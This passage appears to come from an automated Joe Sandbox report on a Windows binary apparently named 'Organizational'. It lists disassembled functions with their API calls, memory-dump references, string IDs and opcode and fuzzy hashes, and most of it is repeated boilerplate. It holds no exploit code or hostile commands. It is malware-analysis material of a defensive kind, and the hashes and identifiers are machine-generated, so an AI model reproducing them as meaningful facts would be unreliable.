                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 70c780ed93e27db26bd5ae89cf6cafcac040d17b92bc98ccb8951f952003ccf3
                                                    • Instruction ID: 48e99972305fd5819fa811cd3b01793cfaf10a9f687c63ae98aa5c2ac1df3e41
                                                    • Opcode Fuzzy Hash: 70c780ed93e27db26bd5ae89cf6cafcac040d17b92bc98ccb8951f952003ccf3
                                                    • Instruction Fuzzy Hash: 5B11487161520CFFEB208FA4DC84AFEBBA8EF45744F105599E905E7120D6319E44A7A0
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F82C4C), ref: 00F53F57
                                                    • GetLastError.KERNEL32 ref: 00F53F66
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F53F75
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F82C4C), ref: 00F53FD2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: 74b2cb8dc0556bc7b5094921caea4e9dd9684181ec98deead8efcf966db29822
                                                    • Instruction ID: c09a346e538cf9e76484a5fbbca5569a704b4258a0901074fb752608d6cb271e
                                                    • Opcode Fuzzy Hash: 74b2cb8dc0556bc7b5094921caea4e9dd9684181ec98deead8efcf966db29822
                                                    • Instruction Fuzzy Hash: 362171709082019FC714DF2CC8858AEB7F4BE553A5F104A1DF9A5C72A1DB31DA4AEB92
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F05B58
                                                      • Part of subcall function 00F056F8: _memset.LIBCMT ref: 00F05787
                                                      • Part of subcall function 00F056F8: _wcscpy.LIBCMT ref: 00F057DB
                                                      • Part of subcall function 00F056F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F057EB
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00F05BAD
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F05BBC
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F40D7C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: 0da01608caeb18998486f7ac49513d352d15bfbd02a4808fb4904112388ed270
                                                    • Instruction ID: 99ddafd9b270f04a3f03b46507b1fa4bd5caf67b8e2a784368416526aa541a4d
                                                    • Opcode Fuzzy Hash: 0da01608caeb18998486f7ac49513d352d15bfbd02a4808fb4904112388ed270
                                                    • Instruction Fuzzy Hash: BC21F8B1D047889FE7728B648895BEBFFEC9F41714F00048DEA9A56281CB742988FF41
                                                    APIs
                                                      • Part of subcall function 00F049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F027AF,?,00000001), ref: 00F049F4
                                                    • _free.LIBCMT ref: 00F3FB04
                                                    • _free.LIBCMT ref: 00F3FB4B
                                                      • Part of subcall function 00F029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F02ADF
                                                    Strings
                                                    • Bad directive syntax error, xrefs: 00F3FB33
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: Bad directive syntax error
                                                    • API String ID: 2861923089-2118420937
                                                    • Opcode ID: 664101b33015016485e10adc2c451a1a2b19257633cea8af7d5913851d4e201c
                                                    • Instruction ID: 4340ff61d013c1e4675b50904de5d10cd2c5fe7fc34d4eca6f2243918bd61026
                                                    • Opcode Fuzzy Hash: 664101b33015016485e10adc2c451a1a2b19257633cea8af7d5913851d4e201c
                                                    • Instruction Fuzzy Hash: 98916E71D10219EFCF04EFA4CC919EEB7B4BF05320F14456AF915AB291DB38A949EB50
                                                    APIs
                                                      • Part of subcall function 00F04AB2: __fread_nolock.LIBCMT ref: 00F04AD0
                                                    • _wcscmp.LIBCMT ref: 00F59DE1
                                                    • _wcscmp.LIBCMT ref: 00F59DF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: a3dd2ecbd2914a2cb7c89c73a268f920a44869ced1a92b62068c2adcb23dfc3c
                                                    • Instruction ID: c8c7911a61ca239f710c2b5ba52e9f725295819eb0ece36a088ca4420f051ae0
                                                    • Opcode Fuzzy Hash: a3dd2ecbd2914a2cb7c89c73a268f920a44869ced1a92b62068c2adcb23dfc3c
                                                    • Instruction Fuzzy Hash: 3E41E971A44209FADF20DEA4CC46FDF77BDDF45710F000469FA00A7181D675A948A7A5
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4032B
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00F40375
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                      • Part of subcall function 00F109C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F109E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: f72010664a7d54f574d98837c2a8dc4a19fc333ccfabe97b8c3ede22d665bf9d
                                                    • Instruction ID: 7d45562c7c30a41abfb8fc203c1818695a0cea6fd3155b31471aa288adbf8611
                                                    • Opcode Fuzzy Hash: f72010664a7d54f574d98837c2a8dc4a19fc333ccfabe97b8c3ede22d665bf9d
                                                    • Instruction Fuzzy Hash: BE218171A002989BCB41DF94CC49BEE7BF8AF49314F00405AE404A7281DFB95A8DFFA1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7798645014bb075ce37a7bde0552db7ee8e7949c696d4e3d67bc0da45e7a6be9
                                                    • Instruction ID: 2d0f278bd58d1b159febab2dd72e3b265b21841d4aa77b5750921a3d6b414969
                                                    • Opcode Fuzzy Hash: 7798645014bb075ce37a7bde0552db7ee8e7949c696d4e3d67bc0da45e7a6be9
                                                    • Instruction Fuzzy Hash: 39F14AB1A083049FC714DF28C884A6ABBE5FF88314F14892DF9999B351DB35E945CF82
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F059F9
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F05A9E
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F05ABB
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: c924fdd742f38faf8d1005c688832ec0712221232303fa76273b8e343d79cd56
                                                    • Instruction ID: f92d78ca86e988a56f5f4f58b7073d409f1083dc8d488177eb80cac5df11df61
                                                    • Opcode Fuzzy Hash: c924fdd742f38faf8d1005c688832ec0712221232303fa76273b8e343d79cd56
                                                    • Instruction Fuzzy Hash: CC3184B0A057058FD720DF74D8C4697BBE4FB48714F000A2EF69A87291D7B5A944EF51
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00F15953
                                                      • Part of subcall function 00F1A39B: __NMSG_WRITE.LIBCMT ref: 00F1A3C2
                                                      • Part of subcall function 00F1A39B: __NMSG_WRITE.LIBCMT ref: 00F1A3CC
                                                    • __NMSG_WRITE.LIBCMT ref: 00F1595A
                                                      • Part of subcall function 00F1A3F8: GetModuleFileNameW.KERNEL32(00000000,00FB53BA,00000104,00000004,00000001,00F11003), ref: 00F1A48A
                                                      • Part of subcall function 00F1A3F8: ___crtMessageBoxW.LIBCMT ref: 00F1A538
                                                      • Part of subcall function 00F132CF: ___crtCorExitProcess.LIBCMT ref: 00F132D5
                                                      • Part of subcall function 00F132CF: ExitProcess.KERNEL32 ref: 00F132DE
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    • RtlAllocateHeap.NTDLL(01450000,00000000,00000001,?,00000004,?,?,00F11003,?), ref: 00F1597F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: 8b9d4a64a92a1f78c46d1c60e73fdbd23f45dc5d42b07a05a44a74034f927f8e
                                                    • Instruction ID: 24a746994edca21643552682d3a3cab5cdb55754e0e57fe9624d02060ce700dc
                                                    • Opcode Fuzzy Hash: 8b9d4a64a92a1f78c46d1c60e73fdbd23f45dc5d42b07a05a44a74034f927f8e
                                                    • Instruction Fuzzy Hash: B401F532702B06DAE6153774AC42BEE32588F92FB0F940126F8149A1D1DEB88DC17B62
                                                    APIs
                                                    • _free.LIBCMT ref: 00F592D6
                                                      • Part of subcall function 00F12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12F99
                                                      • Part of subcall function 00F12F85: GetLastError.KERNEL32(00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12FAB
                                                    • _free.LIBCMT ref: 00F592E7
                                                    • _free.LIBCMT ref: 00F592F9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                    • Instruction ID: c24e82273cbfcc695882e427a48cae0a1c8eb46eb5b91faaa1f7e25c061db126
                                                    • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                    • Instruction Fuzzy Hash: 3FE0C2A1B0C70293CA28A5B97C44ED377EC0F88322F14040DB909D3146CE68E882B078
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    • Opcode ID: e43b5d4c41b3280f45870658e5f906d62734e659c286d300a377f721154a5491
                                                    • Instruction ID: 4cf92c08a8f1c13a99be24169f382c6b3af7eed8bc3e38b24d1ea490806a3063
                                                    • Opcode Fuzzy Hash: e43b5d4c41b3280f45870658e5f906d62734e659c286d300a377f721154a5491
                                                    • Instruction Fuzzy Hash: 92326C71508315DFC724DF14C890A6ABBE1BF84304F14996DFA8AAB362D735EC45EB82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: EA06
                                                    • API String ID: 4104443479-3962188686
                                                    • Opcode ID: 81a50d06be5eacb5afc868c7bb31b83f614aebc28358ac3e5738982f7f6918f6
                                                    • Instruction ID: dc3ac6365ee81add88955616d263ec2ef0f8cbf003ba4fe68eba869920697dba
                                                    • Opcode Fuzzy Hash: 81a50d06be5eacb5afc868c7bb31b83f614aebc28358ac3e5738982f7f6918f6
                                                    • Instruction Fuzzy Hash: 22418DA2E041589BDF219B648D517BF7FA58B45310F184075FF82EB2C6CA38AD84B3E1
                                                    APIs
                                                    • _strcat.LIBCMT ref: 00F6E20C
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • _wcscpy.LIBCMT ref: 00F6E29B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1012013722-0
                                                    • Opcode ID: 2fbc19c1858e9408641fc9cbdc2cf1649f70432055c99fe0e16180598fa60f6c
                                                    • Instruction ID: 38be52d66e6ff9e6a5ded0d7f2d8d22b799741731b78aa78bbfd21071e1705d2
                                                    • Opcode Fuzzy Hash: 2fbc19c1858e9408641fc9cbdc2cf1649f70432055c99fe0e16180598fa60f6c
                                                    • Instruction Fuzzy Hash: 11914A3AA00604DFCB18DF18C5829ADBBE5FF59310B55805AE90ADF3A2DB30ED45DB80
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3712363035-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: dc8bbe4bdc1e3db9a420a976d09b5ef64070602979b88a6a0df6b404fb3caf5c
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: A931C571A00109DFD718DF5AC480AA9F7A6FF59310B648AA5E409CB251EBB1EDC1EBC0
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00F05FEF
                                                      • Part of subcall function 00F1359C: __lock.LIBCMT ref: 00F135A2
                                                      • Part of subcall function 00F1359C: DecodePointer.KERNEL32(00000001,?,00F06004,00F48892), ref: 00F135AE
                                                      • Part of subcall function 00F1359C: EncodePointer.KERNEL32(?,?,00F06004,00F48892), ref: 00F135B9
                                                      • Part of subcall function 00F05F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F05F18
                                                      • Part of subcall function 00F05F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F05F2D
                                                      • Part of subcall function 00F05240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F0526C
                                                      • Part of subcall function 00F05240: IsDebuggerPresent.KERNEL32 ref: 00F0527E
                                                      • Part of subcall function 00F05240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00F052E6
                                                      • Part of subcall function 00F05240: SetCurrentDirectoryW.KERNEL32(?), ref: 00F05366
                                                    • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00F0602F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: 8fb259b474baa9d3464d3f7b28fdc73af21e80c4ac2ed5fb9354637a10f46bd4
                                                    • Instruction ID: 45b5cad0a7b6bcd4e44aae61943c926b623eacd4b5d6cb984d39efd75d22d292
                                                    • Opcode Fuzzy Hash: 8fb259b474baa9d3464d3f7b28fdc73af21e80c4ac2ed5fb9354637a10f46bd4
                                                    • Instruction Fuzzy Hash: F5119D7180830A9BC710EF68EC8595BBBE8EFC9750F00461EF544972B1DBB19949EF92
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00F03E72,?,?,?,00000000), ref: 00F04327
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00F03E72,?,?,?,00000000), ref: 00F40717
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 7afb6d08bf5232a2262e38e0756f625a29760efd7577bc670d4828aef1078685
                                                    • Instruction ID: 667946cb95c9146220157adf7a3b1872ac7eaaf930bb10bf7cf510b1f219dc83
                                                    • Opcode Fuzzy Hash: 7afb6d08bf5232a2262e38e0756f625a29760efd7577bc670d4828aef1078685
                                                    • Instruction Fuzzy Hash: FE0184B0144309BEF3600E148D8AFA67A9CAB01778F50C215BBD55A1D0C6B46C45BB14
                                                    APIs
                                                      • Part of subcall function 00F1593C: __FF_MSGBANNER.LIBCMT ref: 00F15953
                                                      • Part of subcall function 00F1593C: __NMSG_WRITE.LIBCMT ref: 00F1595A
                                                      • Part of subcall function 00F1593C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001,?,00000004,?,?,00F11003,?), ref: 00F1597F
                                                    • std::exception::exception.LIBCMT ref: 00F1101C
                                                    • __CxxThrowException@8.LIBCMT ref: 00F11031
                                                      • Part of subcall function 00F187CB: RaiseException.KERNEL32(?,?,?,00FACAF8,?,?,?,?,?,00F11036,?,00FACAF8,?,00000001), ref: 00F18820
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
